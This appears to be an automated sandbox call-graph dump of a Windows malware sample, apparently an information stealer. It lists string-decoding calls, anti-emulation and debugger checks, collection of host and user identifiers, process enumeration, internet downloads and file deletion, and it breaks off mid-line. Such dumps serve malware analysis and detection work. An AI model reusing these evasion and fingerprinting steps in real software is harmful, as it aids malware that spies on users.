21619->21620 21621 4047e8 3 API calls 21620->21621 21622 402bda 21621->21622 21623 4047e8 3 API calls 21622->21623 21624 402bf0 21623->21624 21625 4047e8 3 API calls 21624->21625 21626 402c07 21625->21626 21627 4047e8 3 API calls 21626->21627 21628 402c1e 21627->21628 21629 4047e8 3 API calls 21628->21629 21630 402c38 21629->21630 21631 4047e8 3 API calls 21630->21631 21632 402c4f 21631->21632 21633 4047e8 3 API calls 21632->21633 21634 402c66 21633->21634 21635 4047e8 3 API calls 21634->21635 21636 402c7d 21635->21636 21637 4047e8 3 API calls 21636->21637 21638 402c93 21637->21638 21639 4047e8 3 API calls 21638->21639 21640 402caa 21639->21640 21641 4047e8 3 API calls 21640->21641 21642 402cc1 21641->21642 21643 4047e8 3 API calls 21642->21643 21644 402cd8 21643->21644 21645 4047e8 3 API calls 21644->21645 21646 402cf2 21645->21646 21647 4047e8 3 API calls 21646->21647 21648 402d09 21647->21648 21649 4047e8 3 API calls 21648->21649 21650 402d20 21649->21650 21651 4047e8 3 API calls 21650->21651 21652 402d37 21651->21652 21653 4047e8 3 API calls 21652->21653 21654 402d4e 21653->21654 21655 4047e8 3 API calls 21654->21655 21656 402d65 21655->21656 21657 4047e8 3 API calls 21656->21657 21658 402d7c 21657->21658 21659 4047e8 3 API calls 21658->21659 21660 402d92 21659->21660 21661 4047e8 3 API calls 21660->21661 21662 402dac 21661->21662 21663 4047e8 3 API calls 21662->21663 21664 402dc3 21663->21664 21665 4047e8 3 API calls 21664->21665 21666 402dda 21665->21666 21667 4047e8 3 API calls 21666->21667 21668 402df1 21667->21668 21669 4047e8 3 API calls 21668->21669 21670 402e07 21669->21670 21671 4047e8 3 API calls 21670->21671 21672 402e1e 21671->21672 21673 4047e8 3 API calls 21672->21673 21674 402e35 21673->21674 21675 4047e8 3 API calls 21674->21675 21676 402e4c 21675->21676 21677 4047e8 3 API calls 21676->21677 21678 402e66 21677->21678 21679 4047e8 3 API calls 21678->21679 21680 402e7d 21679->21680 21681 4047e8 3 API calls 21680->21681 21682 402e94 21681->21682 21683 4047e8 3 API calls 21682->21683 21684 402eaa 21683->21684 21685 4047e8 3 API calls 21684->21685 21686 402ec1 21685->21686 21687 4047e8 3 API calls 21686->21687 21688 402ed8 21687->21688 21689 4047e8 3 API calls 21688->21689 21690 402eec 21689->21690 21691 4047e8 3 API calls 21690->21691 21692 402f03 21691->21692 21693 418643 21692->21693 21864 41859a GetPEB 21693->21864 21695 418649 21696 418872 LoadLibraryA 21695->21696 21697 4184c1 21696->21697 21698 4010f0 GetCurrentProcess VirtualAllocExNuma 21697->21698 21699 401111 ExitProcess 21698->21699 21700 401098 VirtualAlloc 21698->21700 21703 4010b8 _memset 21700->21703 21702 4010ec 21705 401284 21702->21705 21703->21702 21704 4010d5 VirtualFree 21703->21704 21704->21702 21706 4012ac _memset 21705->21706 21707 4012bb 13 API calls 21706->21707 21865 410c85 GetProcessHeap RtlAllocateHeap GetComputerNameA 21707->21865 21709 4013e9 21867 41d016 21709->21867 21713 4013f4 21713->21570 21714 4013e2 ExitProcess 21715 4013b9 21715->21709 21715->21714 21716->21575 21717->21583 21877 4014ad GetPEB 21718->21877 21721 4014ad 2 API calls 21722 401516 21721->21722 21723 4014ad 2 API calls 21722->21723 21740 4015a1 21722->21740 21724 401529 21723->21724 21725 4014ad 2 API calls 21724->21725 21724->21740 21726 401538 21725->21726 21727 4014ad 2 API calls 21726->21727 21726->21740 21728 401547 21727->21728 21729 4014ad 2 API calls 21728->21729 21728->21740 21730 401556 21729->21730 21731 4014ad 2 API calls 21730->21731 21730->21740 21732 401565 21731->21732 21733 4014ad 2 API calls 21732->21733 21732->21740 21734 401574 21733->21734 21735 4014ad 2 API calls 21734->21735 21734->21740 21736 401583 21735->21736 21737 4014ad 2 API calls 21736->21737 21736->21740 21738 401592 21737->21738 21739 4014ad 2 API calls 21738->21739 21738->21740 21739->21740 21740->21592 21742 4016a4 wsprintfW 21741->21742 21743 4017f7 21741->21743 21744 4016d0 CreateFileW 21742->21744 21745 41d016 setSBUpLow 5 API calls 21743->21745 21744->21743 21746 4016fb GetProcessHeap RtlAllocateHeap _time64 srand rand 21744->21746 21747 401807 21745->21747 21751 401754 _memset 21746->21751 21747->21600 21748 401733 WriteFile 21748->21743 21748->21751 21749 401768 CloseHandle CreateFileW 21749->21743 21750 40179e ReadFile 21749->21750 21750->21743 21750->21751 21751->21743 21751->21748 21751->21749 21752 4017c3 GetProcessHeap RtlFreeHeap CloseHandle 21751->21752 21752->21743 21752->21744 21754 417051 21753->21754 21881 410c53 GetProcessHeap HeapAlloc GetUserNameA 21754->21881 21756 417080 21882 402f12 21756->21882 21759 418950 5 API calls 21800 4172ca 21759->21800 21761 4175a3 21762 417604 CreateDirectoryA 21761->21762 21763 417621 21762->21763 22447 4169b6 21763->22447 21765 41762e 22452 4109a2 21765->22452 21767 417720 22463 404b2e 21767->22463 21771 417744 22480 405f39 21771->22480 21775 4177a2 21776 405f39 11 API calls 21775->21776 21777 4177cc 21776->21777 22495 413259 strtok_s 21777->22495 21779 4177df 21780 405f39 11 API calls 21779->21780 21781 41780f 21780->21781 22499 413390 strtok_s 21781->22499 21783 417822 22503 413b86 21783->22503 21785 417838 22549 405237 21785->22549 21787 41785c 22557 40eabc 21787->22557 21789 417890 21790 417908 21789->21790 21792 405f39 11 API calls 21789->21792 21791 417989 21790->21791 21794 405f39 11 API calls 21790->21794 21793 405f39 11 API calls 21791->21793 21795 4178cc 21792->21795 21796 4179c2 21793->21796 21797 41794b 21794->21797 22588 4134d8 strtok_s strtok_s 21795->22588 22572 4135a8 strtok_s 21796->22572 22590 413198 strtok_s strtok_s 21797->22590 21799 4178df 22589 40274e 58 API calls 21799->22589 21811 41757f 21800->21811 22437 41257f 21800->22437 21803 4179d5 22579 415392 21803->22579 21804 41795e 22591 41310c 18 API calls 21804->22591 21810 41cc6c 10 API calls 21810->21811 22443 411c4a 21811->22443 21812 4179fe 21814 417a2a 21812->21814 22592 41566f 58 API calls 2 library calls 21812->22592 21815 417a4c 21814->21815 22594 415df7 60 API calls setSBUpLow 21814->22594 21819 417a6e 21815->21819 22595 416330 58 API calls setSBUpLow 21815->22595 21816 417a1e 22593 416fb7 139 API calls 21816->22593 21820 417a90 21819->21820 22596 4164bd 58 API calls 2 library calls 21819->22596 21824 417ac7 21820->21824 22597 411f55 11 API calls setSBUpLow 21820->22597 21825 417b44 21824->21825 21827 405f39 11 API calls 21824->21827 21826 405f39 11 API calls 21825->21826 21838 417b76 21826->21838 21828 417b06 21827->21828 22598 413198 strtok_s strtok_s 21828->22598 21830 417b19 22599 41310c 18 API calls 21830->22599 21833 417ff9 22584 418271 21833->22584 21835 41801c 21836 41d016 setSBUpLow 5 API calls 21835->21836 21837 41810d 21836->21837 21837->21609 21849 41cc6c 21837->21849 21852 418950 21837->21852 21839 41257f 7 API calls 21838->21839 21848 417fc1 21838->21848 21840 417e31 21839->21840 21840->21848 22600 41cd21 malloc WriteFile 21840->22600 21842 417e49 22601 405482 21842->22601 21846 417f96 22613 41310c 18 API calls 21846->22613 22583 412541 SHFileOperationA 21848->22583 22826 41cbb8 malloc 21849->22826 21851 41cc7c 21851->21608 21853 418dcf LoadLibraryA 21852->21853 21859 41895d 21852->21859 21854 418dec LoadLibraryA 21853->21854 21856 418e1f LoadLibraryA LoadLibraryA LoadLibraryA 21854->21856 21858 418e70 21856->21858 21858->21608 21859->21853 21861 402b7c 21860->21861 21862 40480f 21860->21862 21861->21615 21863 404818 lstrlenA 21862->21863 21863->21861 21863->21863 21864->21695 21866 401385 21865->21866 21866->21709 21875 410c53 GetProcessHeap HeapAlloc GetUserNameA 21866->21875 21868 41d020 IsDebuggerPresent 21867->21868 21869 41d01e 21867->21869 21876 41d975 21868->21876 21869->21713 21872 41d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 21873 41d485 GetCurrentProcess TerminateProcess 21872->21873 21874 41d47d __call_reportfault 21872->21874 21873->21713 21874->21873 21875->21715 21876->21872 21878 4014e9 21877->21878 21879 4014d9 lstrcmpiW 21878->21879 21880 4014ef 21878->21880 21879->21878 21879->21880 21880->21721 21880->21740 21881->21756 21883 4047e8 3 API calls 21882->21883 21884 402f27 21883->21884 21885 4047e8 3 API calls 21884->21885 21886 402f3e 21885->21886 21887 4047e8 3 API calls 21886->21887 21888 402f55 21887->21888 21889 4047e8 3 API calls 21888->21889 21890 402f6c 21889->21890 21891 4047e8 3 API calls 21890->21891 21892 402f85 21891->21892 21893 4047e8 3 API calls 21892->21893 21894 402f9c 21893->21894 21895 4047e8 3 API calls 21894->21895 21896 402fb3 21895->21896 21897 4047e8 3 API calls 21896->21897 21898 402fca 21897->21898 21899 4047e8 3 API calls 21898->21899 21900 402fe4 21899->21900 21901 4047e8 3 API calls 21900->21901 21902 402ffb 21901->21902 21903 4047e8 3 API calls 21902->21903 21904 403011 21903->21904 21905 4047e8 3 API calls 21904->21905 21906 403028 21905->21906 21907 4047e8 3 API calls 21906->21907 21908 40303f 21907->21908 21909 4047e8 3 API calls 21908->21909 21910 403056 21909->21910 21911 4047e8 3 API calls 21910->21911 21912 40306d 21911->21912 21913 4047e8 3 API calls 21912->21913 21914 403084 21913->21914 21915 4047e8 3 API calls 21914->21915 21916 40309b 21915->21916 21917 4047e8 3 API calls 21916->21917 21918 4030b2 21917->21918 21919 4047e8 3 API calls 21918->21919 21920 4030c9 21919->21920 21921 4047e8 3 API calls 21920->21921 21922 4030df 21921->21922 21923 4047e8 3 API calls 21922->21923 21924 4030f6 21923->21924 21925 4047e8 3 API calls 21924->21925 21926 40310f 21925->21926 21927 4047e8 3 API calls 21926->21927 21928 403123 21927->21928 21929 4047e8 3 API calls 21928->21929 21930 40313a 21929->21930 21931 4047e8 3 API calls 21930->21931 21932 403154 21931->21932 21933 4047e8 3 API calls 21932->21933 21934 40316b 21933->21934 21935 4047e8 3 API calls 21934->21935 21936 403182 21935->21936 21937 4047e8 3 API calls 21936->21937 21938 403199 21937->21938 21939 4047e8 3 API calls 21938->21939 21940 4031af 21939->21940 21941 4047e8 3 API calls 21940->21941 21942 4031c5 21941->21942 21943 4047e8 3 API calls 21942->21943 21944 4031dc 21943->21944 21945 4047e8 3 API calls 21944->21945 21946 4031f2 21945->21946 21947 4047e8 3 API calls 21946->21947 21948 40320c 21947->21948 21949 4047e8 3 API calls 21948->21949 21950 403223 21949->21950 21951 4047e8 3 API calls 21950->21951 21952 40323a 21951->21952 21953 4047e8 3 API calls 21952->21953 21954 403250 21953->21954 21955 4047e8 3 API calls 21954->21955 21956 403267 21955->21956 21957 4047e8 3 API calls 21956->21957 21958 40327e 21957->21958 21959 4047e8 3 API calls 21958->21959 21960 403295 21959->21960 21961 4047e8 3 API calls 21960->21961 21962 4032ab 21961->21962 21963 4047e8 3 API calls 21962->21963 21964 4032c2 21963->21964 21965 4047e8 3 API calls 21964->21965 21966 4032d9 21965->21966 21967 4047e8 3 API calls 21966->21967 21968 4032f0 21967->21968 21969 4047e8 3 API calls 21968->21969 21970 403306 21969->21970 21971 4047e8 3 API calls 21970->21971 21972 40331c 21971->21972 21973 4047e8 3 API calls 21972->21973 21974 403333 21973->21974 21975 4047e8 3 API calls 21974->21975 21976 403349 21975->21976 21977 4047e8 3 API calls 21976->21977 21978 40335d 21977->21978 21979 4047e8 3 API calls 21978->21979 21980 403374 21979->21980 21981 4047e8 3 API calls 21980->21981 21982 40338a 21981->21982 21983 4047e8 3 API calls 21982->21983 21984 4033a1 21983->21984 21985 4047e8 3 API calls 21984->21985 21986 4033b8 21985->21986 21987 4047e8 3 API calls 21986->21987 21988 4033cf 21987->21988 21989 4047e8 3 API calls 21988->21989 21990 4033e6 21989->21990 21991 4047e8 3 API calls 21990->21991 21992 4033fd 21991->21992 21993 4047e8 3 API calls 21992->21993 21994 403414 21993->21994 21995 4047e8 3 API calls 21994->21995 21996 40342e 21995->21996 21997 4047e8 3 API calls 21996->21997 21998 403445 21997->21998 21999 4047e8 3 API calls 21998->21999 22000 40345c 21999->22000 22001 4047e8 3 API calls 22000->22001 22002 403473 22001->22002 22003 4047e8 3 API calls 22002->22003 22004 40348a 22003->22004 22005 4047e8 3 API calls 22004->22005 22006 4034a1 22005->22006 22007 4047e8 3 API calls 22006->22007 22008 4034b8 22007->22008 22009 4047e8 3 API calls 22008->22009 22010 4034cf 22009->22010 22011 4047e8 3 API calls 22010->22011 22012 4034e9 22011->22012 22013 4047e8 3 API calls 22012->22013 22014 403500 22013->22014 22015 4047e8 3 API calls 22014->22015 22016 403517 22015->22016 22017 4047e8 3 API calls 22016->22017 22018 40352e 22017->22018 22019 4047e8 3 API calls 22018->22019 22020 403545 22019->22020 22021 4047e8 3 API calls 22020->22021 22022 40355c 22021->22022 22023 4047e8 3 API calls 22022->22023 22024 403573 22023->22024 22025 4047e8 3 API calls 22024->22025 22026 40358a 22025->22026 22027 4047e8 3 API calls 22026->22027 22028 4035a4 22027->22028 22029 4047e8 3 API calls 22028->22029 22030 4035bb 22029->22030 22031 4047e8 3 API calls 22030->22031 22032 4035d2 22031->22032 22033 4047e8 3 API calls 22032->22033 22034 4035e9 22033->22034 22035 4047e8 3 API calls 22034->22035 22036 403600 22035->22036 22037 4047e8 3 API calls 22036->22037 22038 403617 22037->22038 22039 4047e8 3 API calls 22038->22039 22040 40362d 22039->22040 22041 4047e8 3 API calls 22040->22041 22042 403643 22041->22042 22043 4047e8 3 API calls 22042->22043 22044 40365d 22043->22044 22045 4047e8 3 API calls 22044->22045 22046 403674 22045->22046 22047 4047e8 3 API calls 22046->22047 22048 40368b 22047->22048 22049 4047e8 3 API calls 22048->22049 22050 4036a1 22049->22050 22051 4047e8 3 API calls 22050->22051 22052 4036b8 22051->22052 22053 4047e8 3 API calls 22052->22053 22054 4036cf 22053->22054 22055 4047e8 3 API calls 22054->22055 22056 4036e3 22055->22056 22057 4047e8 3 API calls 22056->22057 22058 4036f9 22057->22058 22059 4047e8 3 API calls 22058->22059 22060 403713 22059->22060 22061 4047e8 3 API calls 22060->22061 22062 40372a 22061->22062 22063 4047e8 3 API calls 22062->22063 22064 403741 22063->22064 22065 4047e8 3 API calls 22064->22065 22066 403758 22065->22066 22067 4047e8 3 API calls 22066->22067 22068 40376f 22067->22068 22069 4047e8 3 API calls 22068->22069 22070 403786 22069->22070 22071 4047e8 3 API calls 22070->22071 22072 40379a 22071->22072 22073 4047e8 3 API calls 22072->22073 22074 4037b1 22073->22074 22075 4047e8 3 API calls 22074->22075 22076 4037cb 22075->22076 22077 4047e8 3 API calls 22076->22077 22078 4037e2 22077->22078 22079 4047e8 3 API calls 22078->22079 22080 4037f6 22079->22080 22081 4047e8 3 API calls 22080->22081 22082 40380a 22081->22082 22083 4047e8 3 API calls 22082->22083 22084 403821 22083->22084 22085 4047e8 3 API calls 22084->22085 22086 403838 22085->22086 22087 4047e8 3 API calls 22086->22087 22088 40384f 22087->22088 22089 4047e8 3 API calls 22088->22089 22090 403866 22089->22090 22091 4047e8 3 API calls 22090->22091 22092 403880 22091->22092 22093 4047e8 3 API calls 22092->22093 22094 403897 22093->22094 22095 4047e8 3 API calls 22094->22095 22096 4038ae 22095->22096 22097 4047e8 3 API calls 22096->22097 22098 4038c5 22097->22098 22099 4047e8 3 API calls 22098->22099 22100 4038db 22099->22100 22101 4047e8 3 API calls 22100->22101 22102 4038f2 22101->22102 22103 4047e8 3 API calls 22102->22103 22104 403906 22103->22104 22105 4047e8 3 API calls 22104->22105 22106 40391d 22105->22106 22107 4047e8 3 API calls 22106->22107 22108 403937 22107->22108 22109 4047e8 3 API calls 22108->22109 22110 40394e 22109->22110 22111 4047e8 3 API calls 22110->22111 22112 403965 22111->22112 22113 4047e8 3 API calls 22112->22113 22114 40397c 22113->22114 22115 4047e8 3 API calls 22114->22115 22116 403993 22115->22116 22117 4047e8 3 API calls 22116->22117 22118 4039aa 22117->22118 22119 4047e8 3 API calls 22118->22119 22120 4039c1 22119->22120 22121 4047e8 3 API calls 22120->22121 22122 4039d8 22121->22122 22123 4047e8 3 API calls 22122->22123 22124 4039f2 22123->22124 22125 4047e8 3 API calls 22124->22125 22126 403a09 22125->22126 22127 4047e8 3 API calls 22126->22127 22128 403a20 22127->22128 22129 4047e8 3 API calls 22128->22129 22130 403a37 22129->22130 22131 4047e8 3 API calls 22130->22131 22132 403a4e 22131->22132 22133 4047e8 3 API calls 22132->22133 22134 403a65 22133->22134 22135 4047e8 3 API calls 22134->22135 22136 403a7c 22135->22136 22137 4047e8 3 API calls 22136->22137 22138 403a90 22137->22138 22139 4047e8 3 API calls 22138->22139 22140 403aaa 22139->22140 22141 4047e8 3 API calls 22140->22141 22142 403ac1 22141->22142 22143 4047e8 3 API calls 22142->22143 22144 403ad7 22143->22144 22145 4047e8 3 API calls 22144->22145 22146 403aee 22145->22146 22147 4047e8 3 API calls 22146->22147 22148 403b05 22147->22148 22149 4047e8 3 API calls 22148->22149 22150 403b1c 22149->22150 22151 4047e8 3 API calls 22150->22151 22152 403b33 22151->22152 22153 4047e8 3 API calls 22152->22153 22154 403b4a 22153->22154 22155 4047e8 3 API calls 22154->22155 22156 403b61 22155->22156 22157 4047e8 3 API calls 22156->22157 22158 403b75 22157->22158 22159 4047e8 3 API calls 22158->22159 22160 403b8c 22159->22160 22161 4047e8 3 API calls 22160->22161 22162 403ba3 22161->22162 22163 4047e8 3 API calls 22162->22163 22164 403bba 22163->22164 22165 4047e8 3 API calls 22164->22165 22166 403bd1 22165->22166 22167 4047e8 3 API calls 22166->22167 22168 403be8 22167->22168 22169 4047e8 3 API calls 22168->22169 22170 403bff 22169->22170 22171 4047e8 3 API calls 22170->22171 22172 403c19 22171->22172 22173 4047e8 3 API calls 22172->22173 22174 403c30 22173->22174 22175 4047e8 3 API calls 22174->22175 22176 403c47 22175->22176 22177 4047e8 3 API calls 22176->22177 22178 403c5e 22177->22178 22179 4047e8 3 API calls 22178->22179 22180 403c75 22179->22180 22181 4047e8 3 API calls 22180->22181 22182 403c8c 22181->22182 22183 4047e8 3 API calls 22182->22183 22184 403ca3 22183->22184 22185 4047e8 3 API calls 22184->22185 22186 403cb7 22185->22186 22187 4047e8 3 API calls 22186->22187 22188 403cd1 22187->22188 22189 4047e8 3 API calls 22188->22189 22190 403ce8 22189->22190 22191 4047e8 3 API calls 22190->22191 22192 403cff 22191->22192 22193 4047e8 3 API calls 22192->22193 22194 403d16 22193->22194 22195 4047e8 3 API calls 22194->22195 22196 403d2c 22195->22196 22197 4047e8 3 API calls 22196->22197 22198 403d43 22197->22198 22199 4047e8 3 API calls 22198->22199 22200 403d57 22199->22200 22201 4047e8 3 API calls 22200->22201 22202 403d6e 22201->22202 22203 4047e8 3 API calls 22202->22203 22204 403d85 22203->22204 22205 4047e8 3 API calls 22204->22205 22206 403d9c 22205->22206 22207 4047e8 3 API calls 22206->22207 22208 403db3 22207->22208 22209 4047e8 3 API calls 22208->22209 22210 403dca 22209->22210 22211 4047e8 3 API calls 22210->22211 22212 403de1 22211->22212 22213 4047e8 3 API calls 22212->22213 22214 403df8 22213->22214 22215 4047e8 3 API calls 22214->22215 22216 403e0f 22215->22216 22217 4047e8 3 API calls 22216->22217 22218 403e26 22217->22218 22219 4047e8 3 API calls 22218->22219 22220 403e40 22219->22220 22221 4047e8 3 API calls 22220->22221 22222 403e57 22221->22222 22223 4047e8 3 API calls 22222->22223 22224 403e6e 22223->22224 22225 4047e8 3 API calls 22224->22225 22226 403e84 22225->22226 22227 4047e8 3 API calls 22226->22227 22228 403e9b 22227->22228 22229 4047e8 3 API calls 22228->22229 22230 403eb2 22229->22230 22231 4047e8 3 API calls 22230->22231 22232 403ec9 22231->22232 22233 4047e8 3 API calls 22232->22233 22234 403ee0 22233->22234 22235 4047e8 3 API calls 22234->22235 22236 403efa 22235->22236 22237 4047e8 3 API calls 22236->22237 22238 403f10 22237->22238 22239 4047e8 3 API calls 22238->22239 22240 403f27 22239->22240 22241 4047e8 3 API calls 22240->22241 22242 403f3e 22241->22242 22243 4047e8 3 API calls 22242->22243 22244 403f55 22243->22244 22245 4047e8 3 API calls 22244->22245 22246 403f6c 22245->22246 22247 4047e8 3 API calls 22246->22247 22248 403f80 22247->22248 22249 4047e8 3 API calls 22248->22249 22250 403f97 22249->22250 22251 4047e8 3 API calls 22250->22251 22252 403fb1 22251->22252 22253 4047e8 3 API calls 22252->22253 22254 403fc7 22253->22254 22255 4047e8 3 API calls 22254->22255 22256 403fde 22255->22256 22257 4047e8 3 API calls 22256->22257 22258 403ff2 22257->22258 22259 4047e8 3 API calls 22258->22259 22260 404009 22259->22260 22261 4047e8 3 API calls 22260->22261 22262 404020 22261->22262 22263 4047e8 3 API calls 22262->22263 22264 404037 22263->22264 22265 4047e8 3 API calls 22264->22265 22266 40404e 22265->22266 22267 4047e8 3 API calls 22266->22267 22268 404067 22267->22268 22269 4047e8 3 API calls 22268->22269 22270 40407e 22269->22270 22271 4047e8 3 API calls 22270->22271 22272 404094 22271->22272 22273 4047e8 3 API calls 22272->22273 22274 4040a8 22273->22274 22275 4047e8 3 API calls 22274->22275 22276 4040bf 22275->22276 22277 4047e8 3 API calls 22276->22277 22278 4040d6 22277->22278 22279 4047e8 3 API calls 22278->22279 22280 4040ed 22279->22280 22281 4047e8 3 API calls 22280->22281 22282 404104 22281->22282 22283 4047e8 3 API calls 22282->22283 22284 40411e 22283->22284 22285 4047e8 3 API calls 22284->22285 22286 404135 22285->22286 22287 4047e8 3 API calls 22286->22287 22288 40414c 22287->22288 22289 4047e8 3 API calls 22288->22289 22290 404163 22289->22290 22291 4047e8 3 API calls 22290->22291 22292 404179 22291->22292 22293 4047e8 3 API calls 22292->22293 22294 40418d 22293->22294 22295 4047e8 3 API calls 22294->22295 22296 4041a1 22295->22296 22297 4047e8 3 API calls 22296->22297 22298 4041b8 22297->22298 22299 4047e8 3 API calls 22298->22299 22300 4041d2 22299->22300 22301 4047e8 3 API calls 22300->22301 22302 4041e8 22301->22302 22303 4047e8 3 API calls 22302->22303 22304 4041ff 22303->22304 22305 4047e8 3 API calls 22304->22305 22306 404216 22305->22306 22307 4047e8 3 API calls 22306->22307 22308 40422d 22307->22308 22309 4047e8 3 API calls 22308->22309 22310 404244 22309->22310 22311 4047e8 3 API calls 22310->22311 22312 404258 22311->22312 22313 4047e8 3 API calls 22312->22313 22314 40426e 22313->22314 22315 4047e8 3 API calls 22314->22315 22316 404288 22315->22316 22317 4047e8 3 API calls 22316->22317 22318 40429f 22317->22318 22319 4047e8 3 API calls 22318->22319 22320 4042b6 22319->22320 22321 4047e8 3 API calls 22320->22321 22322 4042cc 22321->22322 22323 4047e8 3 API calls 22322->22323 22324 4042e3 22323->22324 22325 4047e8 3 API calls 22324->22325 22326 4042fa 22325->22326 22327 4047e8 3 API calls 22326->22327 22328 404311 22327->22328 22329 4047e8 3 API calls 22328->22329 22330 404325 22329->22330 22331 4047e8 3 API calls 22330->22331 22332 40433c 22331->22332 22333 4047e8 3 API calls 22332->22333 22334 404353 22333->22334 22335 4047e8 3 API calls 22334->22335 22336 40436a 22335->22336 22337 4047e8 3 API calls 22336->22337 22338 404381 22337->22338 22339 4047e8 3 API calls 22338->22339 22340 404395 22339->22340 22341 4047e8 3 API calls 22340->22341 22342 4043ac 22341->22342 22343 4047e8 3 API calls 22342->22343 22344 4043c3 22343->22344 22345 4047e8 3 API calls 22344->22345 22346 4043da 22345->22346 22347 4047e8 3 API calls 22346->22347 22348 4043f1 22347->22348 22349 4047e8 3 API calls 22348->22349 22350 404408 22349->22350 22351 4047e8 3 API calls 22350->22351 22352 40441c 22351->22352 22353 4047e8 3 API calls 22352->22353 22354 404433 22353->22354 22355 4047e8 3 API calls 22354->22355 22356 40444a 22355->22356 22357 4047e8 3 API calls 22356->22357 22358 40445e 22357->22358 22359 4047e8 3 API calls 22358->22359 22360 404472 22359->22360 22361 4047e8 3 API calls 22360->22361 22362 404486 22361->22362 22363 4047e8 3 API calls 22362->22363 22364 4044a0 22363->22364 22365 4047e8 3 API calls 22364->22365 22366 4044b7 22365->22366 22367 4047e8 3 API calls 22366->22367 22368 4044cd 22367->22368 22369 4047e8 3 API calls 22368->22369 22370 4044e4 22369->22370 22371 4047e8 3 API calls 22370->22371 22372 4044fa 22371->22372 22373 4047e8 3 API calls 22372->22373 22374 404511 22373->22374 22375 4047e8 3 API calls 22374->22375 22376 404528 22375->22376 22377 4047e8 3 API calls 22376->22377 22378 40453e 22377->22378 22379 4047e8 3 API calls 22378->22379 22380 404558 22379->22380 22381 4047e8 3 API calls 22380->22381 22382 40456f 22381->22382 22383 4047e8 3 API calls 22382->22383 22384 404586 22383->22384 22385 4047e8 3 API calls 22384->22385 22386 40459d 22385->22386 22387 4047e8 3 API calls 22386->22387 22388 4045b4 22387->22388 22389 4047e8 3 API calls 22388->22389 22390 4045cb 22389->22390 22391 4047e8 3 API calls 22390->22391 22392 4045e2 22391->22392 22393 4047e8 3 API calls 22392->22393 22394 4045f9 22393->22394 22395 4047e8 3 API calls 22394->22395 22396 404612 22395->22396 22397 4047e8 3 API calls 22396->22397 22398 404629 22397->22398 22399 4047e8 3 API calls 22398->22399 22400 404642 22399->22400 22401 4047e8 3 API calls 22400->22401 22402 404656 22401->22402 22403 4047e8 3 API calls 22402->22403 22404 40466d 22403->22404 22405 4047e8 3 API calls 22404->22405 22406 404684 22405->22406 22407 4047e8 3 API calls 22406->22407 22408 40469b 22407->22408 22409 4047e8 3 API calls 22408->22409 22410 4046b2 22409->22410 22411 4047e8 3 API calls 22410->22411 22412 4046cc 22411->22412 22413 4047e8 3 API calls 22412->22413 22414 4046e3 22413->22414 22415 4047e8 3 API calls 22414->22415 22416 4046f9 22415->22416 22417 4047e8 3 API calls 22416->22417 22418 404710 22417->22418 22419 4047e8 3 API calls 22418->22419 22420 404727 22419->22420 22421 4047e8 3 API calls 22420->22421 22422 40473d 22421->22422 22423 4047e8 3 API calls 22422->22423 22424 404754 22423->22424 22425 4047e8 3 API calls 22424->22425 22426 404768 22425->22426 22427 4047e8 3 API calls 22426->22427 22428 404781 22427->22428 22429 4047e8 3 API calls 22428->22429 22430 404797 22429->22430 22431 4047e8 3 API calls 22430->22431 22432 4047ae 22431->22432 22433 4047e8 3 API calls 22432->22433 22434 4047c5 22433->22434 22435 4047e8 3 API calls 22434->22435 22436 4047dc 22435->22436 22436->21759 22614 42f109 22437->22614 22439 41258e CreateToolhelp32Snapshot Process32First 22440 4125c2 22439->22440 22615 42f165 22440->22615 22444 411c67 22443->22444 22445 41d016 setSBUpLow 5 API calls 22444->22445 22446 411cc8 22445->22446 22446->21761 22450 4169ec 22447->22450 22448 4168c6 16 API calls 22448->22450 22449 41683e 15 API calls 22449->22450 22450->22448 22450->22449 22451 416c0a 22450->22451 22451->21765 22453 4109db GetVolumeInformationA 22452->22453 22456 410a4d 22453->22456 22455 410a7d 22457 41d016 setSBUpLow 5 API calls 22455->22457 22456->22455 22618 411684 GetCurrentHwProfileA 22456->22618 22459 410b2e 22457->22459 22459->21767 22460 410ac7 22625 4123d5 malloc strncpy 22460->22625 22462 410aea 22462->22455 22464 404b59 22463->22464 22627 404ab6 22464->22627 22466 404b65 22467 411c4a 5 API calls 22466->22467 22468 405188 22466->22468 22473 404c15 22467->22473 22469 41d016 setSBUpLow 5 API calls 22468->22469 22470 405235 22469->22470 22474 4139c2 22470->22474 22471 40515c InternetReadFile 22472 405176 InternetCloseHandle 22471->22472 22471->22473 22472->22468 22473->22468 22473->22471 22473->22472 22475 4139dd strtok_s 22474->22475 22477 413b48 22475->22477 22479 413a04 22475->22479 22477->21771 22478 413b2a strtok_s 22478->22477 22478->22479 22479->22478 22481 405f64 22480->22481 22482 404ab6 4 API calls 22481->22482 22483 405f70 22482->22483 22484 411c4a 5 API calls 22483->22484 22485 4066f3 22483->22485 22490 406020 _memmove 22484->22490 22486 41d016 setSBUpLow 5 API calls 22485->22486 22487 4067eb 22486->22487 22491 41343f strtok_s 22487->22491 22488 4066d2 InternetReadFile 22489 4066ec InternetCloseHandle 22488->22489 22488->22490 22489->22485 22490->22485 22490->22488 22490->22489 22492 4134cc 22491->22492 22494 41346e 22491->22494 22492->21775 22493 4134b6 strtok_s 22493->22492 22493->22494 22494->22493 22497 413286 22495->22497 22496 413385 22496->21779 22497->22496 22498 413367 strtok_s 22497->22498 22498->22497 22500 413434 22499->22500 22501 4133bc 22499->22501 22500->21783 22502 41341a strtok_s 22501->22502 22502->22500 22502->22501 22504 413b9f 22503->22504 22632 410cc0 22504->22632 22506 413c44 22637 4115d4 22506->22637 22508 413ca5 22509 411684 8 API calls 22508->22509 22510 413d09 22509->22510 22511 4109a2 9 API calls 22510->22511 22512 413d76 22511->22512 22645 41224a 22512->22645 22514 413dea 22651 410b30 22514->22651 22516 413e95 22658 411807 22516->22658 22518 413ef9 22673 411997 22518->22673 22520 413f67 22521 410c85 3 API calls 22520->22521 22522 413fd2 22521->22522 22683 410c53 GetProcessHeap HeapAlloc GetUserNameA 22522->22683 22524 414033 22684 410ddb 22524->22684 22526 414106 22527 410cc0 6 API calls 22526->22527 22528 414170 22527->22528 22690 410d2e 22528->22690 22530 4141d1 22696 410f51 22530->22696 22532 414252 22701 411007 22532->22701 22534 4142b3 22705 410fba GetSystemInfo 22534->22705 22536 414314 22709 411119 22536->22709 22538 414375 22715 411192 22538->22715 22540 4143e2 22719 4114a5 22540->22719 22542 414455 22727 411203 22542->22727 22544 4144d1 22545 411203 10 API calls 22544->22545 22546 414509 22545->22546 22738 416e97 22546->22738 22548 414586 22548->21785 22550 40525a 22549->22550 22551 404ab6 4 API calls 22550->22551 22552 405266 RtlAllocateHeap 22551->22552 22556 4052ad 22552->22556 22554 41d016 setSBUpLow 